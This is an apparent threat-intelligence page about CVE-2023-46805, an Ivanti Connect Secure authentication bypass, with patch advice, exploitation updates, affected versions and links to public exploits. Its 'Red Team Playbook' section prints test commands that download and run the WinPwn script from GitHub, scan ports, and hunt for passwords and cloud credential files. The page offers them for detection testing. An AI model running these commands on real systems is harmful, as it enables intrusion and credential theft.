CVE-2023-46805
Overview
This vulnerability is an authentication bypass affecting the web component of Ivanti ICS and Ivanti Policy Secure products. The root cause lies in improper access control validation within specific API endpoints, allowing unauthorized requests to circumvent authentication checks. The flaw impacts the Ivanti Connect Secure versions 9.x and 22.x, specifically in the handling of certain REST API paths that fail to enforce authentication requirements.
Vulnerability Description
An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.
Impact
An attacker with no authentication or user interaction can bypass access controls to retrieve sensitive administrative and system configuration data. This unauthorized access can expose backup codes, system information, and administrative options, potentially facilitating further attacks such as privilege escalation or lateral movement within the network. The exposure of these restricted resources compromises the confidentiality and integrity of the affected systems, increasing the risk of data breaches and unauthorized administrative actions.
Solution
Ivanti has released security updates addressing this authentication bypass in Ivanti Connect Secure and Ivanti Policy Secure gateways. Users should apply the latest patches available for versions 9.x and 22.x as detailed in the vendor advisory linked at https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US. Following the vendor’s instructions for updating to the fixed versions is the recommended remediation step to mitigate this vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The authentication bypass vulnerability present in the web component of specific versions of Ivanti Connect Secure and Ivanti Policy Secure allows unauthorized access to restricted resources. This flaw arises from insufficient control checks, enabling a remote attacker to circumvent authentication mechanisms. The vulnerability can be exploited by manipulating requests to the web application, which may not adequately validate user credentials before granting access to sensitive data or functionalities. As a result, an attacker can potentially gain access to user accounts, sensitive configurations, or even administrative functions without proper authorization.
Attack vectors for this vulnerability are diverse, with the primary method being crafted HTTP requests that exploit the flawed authentication logic. An attacker could leverage tools to automate the process of sending requests to the affected web components, systematically probing for weaknesses in the authentication flow. This could lead to scenarios where an attacker impersonates legitimate users or administrators, thereby gaining unauthorized access to critical systems. The potential for exploitation is exacerbated in environments where these products are exposed to the internet, as attackers can target them remotely without needing physical access to the network.
The real-world impact of this vulnerability is significant, particularly for organizations relying on Ivanti's solutions for secure access and policy enforcement. The ability to bypass authentication can lead to data breaches, unauthorized access to sensitive information, and disruption of services. Businesses may face severe repercussions, including financial losses, reputational damage, and regulatory penalties, especially if sensitive customer data is compromised. Furthermore, the high CVSS score of 8.2 indicates that the vulnerability poses a serious risk, warranting immediate attention from security teams to mitigate potential threats.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regular vulnerability assessments and penetration testing can help identify weaknesses in the web components before they can be exploited. Additionally, monitoring logs for unusual access patterns or failed authentication attempts can provide early warning signs of attempted exploitation. Organizations should also apply patches and updates provided by Ivanti promptly, ensuring that their systems are running the latest, most secure versions of the software. Employing Web Application Firewalls (WAFs) can further enhance security by filtering and monitoring HTTP traffic to detect and block suspicious activities.
In conclusion, the authentication bypass vulnerability in Ivanti's web components presents a critical risk that organizations must address proactively. By understanding the technical details, potential attack vectors, and real-world implications, security teams can better prepare their defenses. Implementing robust detection and mitigation strategies will not only safeguard sensitive resources but also enhance the overall security posture of the organization in an increasingly complex threat landscape.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2023-46805, with telemetry indicating a notable surge in attempts to exploit the authentication bypass vulnerability in Ivanti ICS and Policy Secure products. This uptick coincides with the continued availability of multiple new proof-of-concept exploits and scanning tools on public repositories, which lowers the barrier for threat actors to conduct reconnaissance and exploitation. The persistence of ransomware groups linked to this vulnerability underscores its operational relevance in active campaigns, amplifying the risk to organizations that have not yet applied vendor mitigations. Although the EPSS score remains stable, the qualitative increase in exploitation attempts and the proliferation of accessible attack utilities elevate the threat landscape, warranting heightened vigilance. Consequently, the risk level for this vulnerability should be considered elevated due to increased attacker activity and the demonstrated interest from ransomware operators.
Update 2 — July 07, 2026
CSURFACE threat intelligence has detected a marked escalation in activity exploiting the authentication bypass vulnerability in Ivanti ICS and Policy Secure products. Our telemetry indicates a notable surge in exploitation attempts, reflecting increased attacker focus on this vector. Concurrently, several new proof-of-concept exploits and scanning tools have emerged publicly, lowering the barrier for threat actors to identify and leverage vulnerable systems. Although the EPSS score remains stable, the qualitative increase in exploitation signals a heightened operational tempo among adversaries, including ransomware groups known to associate with this vulnerability. This evolving landscape underscores an elevated threat level, as the combination of increased exploitation activity and accessible attack utilities amplifies the risk to organizations that have yet to implement recommended mitigations.
Affected Products (81)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r10:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r11:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r11.3:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r11.4:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r11.5:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r12:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r12.1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r13:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r13.1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r14:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r15:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r15.2:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r16:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r16.1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r17:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r17.1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r18:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r2:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (2)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Ivanti Connect Secure Unauthenticated Remote Code Execution
exploits/linux/http/ivanti_connect_secure_rce_cve_2023_46805
|
sfewer-r7 | Unknown | - | View |
|
Ivanti Connect Secure Unauthenticated Remote Code Execution
exploits/linux/http/ivanti_connect_secure_rce_cve_2024_21893
|
sfewer-r7 | Unknown | - | View |
GitHub PoCs (9)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
duy-31/CVE-2023-46805_CVE-2024-21887
An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a re...
|
duy-31 | 23 | 4 | 2024-01-16 | View |
|
Chocapikk/CVE-2023-46805
Ivanti Pulse Secure CVE-2023-46805 Scanner - Based on Assetnote's Research
|
Chocapikk | 14 | 2 | 2024-01-19 | View |
|
seajaysec/Ivanti-Connect-Around-Scan
Mitigation validation utility for the Ivanti Connect Around attack chain. Runs multiple checks. CVE-2023-46805, CVE-2024...
|
seajaysec | 12 | 3 | 2024-01-19 | View |
|
yoryio/CVE-2023-46805
Scanner for CVE-2023-46805 - Ivanti Connect Secure
|
yoryio | 10 | 1 | 2024-01-14 | View |
|
cbeek-r7/CVE-2023-46805
Simple scanner for scanning a list of ip-addresses for vulnerable Ivanti Pulse Secure devices
|
cbeek-r7 | 5 | 2 | 2024-01-16 | View |
|
raminkarimkhani1996/CVE-2023-46805_CVE-2024-21887
The script in this repository only checks whether the vulnerabilities specified in the Ivanti Connect Secure product exi...
|
raminkarimkhani1996 | 5 | 1 | 2024-01-18 | View |
|
Hexastrike/Ivanti-Connect-Secure-Logs-Parser
A Python script for examining Ivanti Secure Connect (ICS) event logs, designed to support investigations into vulnerabil...
|
Hexastrike | 5 | 1 | 2025-01-19 | View |
|
rxwx/pulse-meter
Parses the System Snapshot from an Ivanti Connect Secure applicance to identify possible IOCs related to CVE-2023-46805,...
|
rxwx | 1 | 1 | 2025-01-14 | View |
|
w2xim3/CVE-2023-46805
CVE-2023-46805 Ivanti POC RCE - Ultra fast scanner.
|
w2xim3 | 2 | 0 | 2024-01-25 | View |
Threat Feed
35 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-46805 |
| forums.ivanti.com |
GitHub CVE
|
https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/176668/Ivanti-Connect-Secure-Unauthenticated-Remote-Code-Execution.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-46805 |